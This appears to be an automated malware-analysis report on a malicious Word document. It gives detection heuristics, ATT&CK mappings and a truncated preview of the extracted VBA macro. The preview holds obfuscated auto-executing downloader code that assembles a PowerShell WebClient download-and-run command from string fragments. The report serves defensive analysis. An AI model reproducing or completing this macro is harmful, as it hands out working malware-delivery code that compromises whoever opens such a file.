MALICIOUS
242
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The macro is configured to auto-execute upon opening (AutoOpen) and uses the Shell() function to execute commands. This indicates the document is designed to download and execute a secondary payload, a common technique for malware delivery. The ClamAV detection and heuristic firings strongly support this assessment.
Heuristics 7
-
ClamAV: Doc.Macro.Obfuscation-6387400-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6387400-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 90593 bytes |
SHA-256: 1bb78b992d1cf6bb82254558a121fea0a520b3ae1f5e8cf0b8fe0745a24352dc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "EPjatGzZtht"
Function jzaNvClIBfMn()
SwlNG = Array(StrReverse("JijhURqUnjnn"), StrReverse("tFwUfSj"), StrReverse("icYjpwKWQiSRT"), StrReverse("ttUYtvMTYjuC"), StrReverse("IIDfOjt"), StrReverse("GKwiSjwXwUW"), StrReverse("GMEzHZnbLDoo"), StrReverse("sBNNCEkZHmjWt"))
iLQhN = Mid("7U68ws2sjAsJiVBn+GBnyGBn+GBnPkarapGBn+GBnas GBn+G'+'Bn+GBn+GBn '+'i6V+i6VIGBn+'+'GXnCpT1dki", 15, 68)
RrjFwwSocw = Array(StrReverse("ETzpTMjd"), StrReverse("SErrHAGa"), StrReverse("fjiJCEq"), StrReverse("jukJlDvPiwNQPz"), StrReverse("ZmUBqhcWYdV"), StrReverse("lhvRszYdot"), StrReverse("hBwbdBsKmhGFWi"), StrReverse("AOHXLjP"))
BbfVk = Array(StrReverse("POwaPYVzwDD"), StrReverse("otRTDVJrZf"), StrReverse("JvPlGzZVdOwY"), StrReverse("PcZQRsFK"), StrReverse("iPqInjNM"), StrReverse("AjimfAm"), StrReverse("AWhZJqVEE"), StrReverse("wtahZZzRzvw"))
YJzLdOzRnMz = Array(StrReverse("clmpsoXukOTDws"), StrReverse("zLVSRzURoCWN"), StrReverse("QmnXitbRr"), StrReverse("PiujiGuviUb"), StrReverse("qXSiBITwn"), StrReverse("bIdzawUERQ"), StrReverse("jFjWQmLt"), StrReverse("ntnAwQEE"))
FmkHQ = Mid("wvjznjlEiijLscGBn+GBnh{GB'+'n+GBnwGBn+GBnrGBn+GBniteGBn+GBn-'+'GBn+GBnhoj80pOdcZ", 14, 59)
ICPnaYzWzU = Array(StrReverse("qIQNzoid"), StrReverse("ZdCridkVZVDjIQ"), StrReverse("bTJEnOArQp"), StrReverse("ZJwtjWbiXPXp"), StrReverse("wPwaZvbhrwmdi"), StrReverse("qiYmmCBEaYf"), StrReverse("jIitEDiSIXRaS"), StrReverse("NwhMKPCslv"))
Arlfi = Array(StrReverse("TwtpuHmCkfwai"), StrReverse("KIGSjHl"), StrReverse("HEfhhUdBKr"), StrReverse("MzSOuLbjO"), StrReverse("jvhJqcr"), StrReverse("zUzGzqoKMZRZj"), StrReverse("GKRFstMHIX"), StrReverse("TbJzXrslLN"))
bNiYWRV = Array(StrReverse("mIcRAokZ"), StrReverse("pjDZFznMjFMQuw"), StrReverse("nIjpEaUsOk"), StrReverse("BqaBGSfirwQF"), StrReverse("jSGVXltsJCirEv"), StrReverse("XVrppUvwli"), StrReverse("ulLHcXDpFlTwUc"), StrReverse("ssowKCWKLVFaP"))
ERhNFjC = Mid("0Gi'+'GBn+GBnPhuGBn+GBni6V+i6Vas = fGBn+GBnyPenGBn+GBnvi6V+i6V:public + IOGBn+'+'GBnWG4kGBn+Gi6V+i6VBnIOW GBn+'+'GBn+GBn+GBn fGju8VFl6i0wzA7l1z", 4, 124)
vrTGTwVI = Array(StrReverse("SFAbZkwBSp"), StrReverse("LoXslkwcq"), StrReverse("ZjiOfMoi"), StrReverse("nXHjrLFQTc"), StrReverse("GFhAQVaf"), StrReverse("HnjWKtW"), StrReverse("MuXKTsBuDE"), StrReverse("jjTizhGTCdw"))
fEGjWTFNX = Array(StrReverse("nWVqYrIjCZ"), StrReverse("nOqiEXWM"), StrReverse("cDIpUwXaAlXwnP"), StrReverse("PwHwliLqP"), StrReverse("WnjcGwjNRzjOf"), StrReverse("bThfQCKzzY"), StrReverse("FPZbQQNtz"), StrReverse("IrwtnniWShBSlU"))
dDwEFUJiJ = Array(StrReverse("qqiSjNSzfAZSjn"), StrReverse("rcSDzXAZNWk"), StrReverse("lGMnBKnG"), StrReverse("GrMkZwOXKOYIC"), StrReverse("YwzUbqRUwwDjr"), StrReverse("MYHwhllkG"), StrReverse("XbmCCHMBj"), StrReverse("opBqLPamv"))
pZsYwLZpa = Mid("4GGm).RePlace'+'(GBi6V+i6VnG4kGBn,[sTi6V+i6VrING][ChAr]92).RePlace(GBnIOWGBn,[sTrING][ChAr]39) fAR .'+' ( Mq5ShELi6V+i6VlId[1]+Mq5SHELliD[13]+GBnXi6V+i6VGBn)i6V).REplaCE(i6VfARi6M48OO7hlm", 5, 174)
tGabaNNw = Array(StrReverse("AfZMiWoHJ"), StrReverse("iJmBhWU"), StrReverse("XSbjmcOcdhq"), StrReverse("niFJPknjV"), StrReverse("UjpsEivVkLj"), StrReverse("NBqRtzwCsHQr"), StrReverse("EEdlwioKv"), StrReverse("sutXkjIwfkAQDS"))
XJVoAvW = Array(StrReverse("htEvKmHbb"), StrReverse("HorjwAEOR"), StrReverse("mBzddXXRkSKzo"), StrReverse("miWqrQAlaSGzz"), StrReverse("tLLLUGbfvb"), StrReverse("nPqqJGIzw"), StrReverse("SdOXBoBbiXiZCX"), StrReverse("GwiiRGjuYE"))
BNkQP = Array(StrReverse("dwNFvHoFsDot"), StrReverse("XKTMaDDXCWH"), StrReverse("jdDbFAt"), StrReverse("DqwkYNfz"), StrReverse("ioIXbRZwj"), StrReverse("ZIOaZGCPikd"), StrReverse("CvnXhNjnNXGG"), StrReverse("hwfEMdiZVU"))
BWNpcbLr = Mid("Qb8dVGfGBn+GBnet.WebGBn+GBnCliGBn+GBnent;fyPn'+'sG'+'Bn+GBnadaGBn+GB'+'nsGBn+GBnd GBn+GBn= new-oi6V+i6VbjGBn+GBnect ranGBn+GBi6V+i6VndGBn+GBnomGBn+GBn;
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.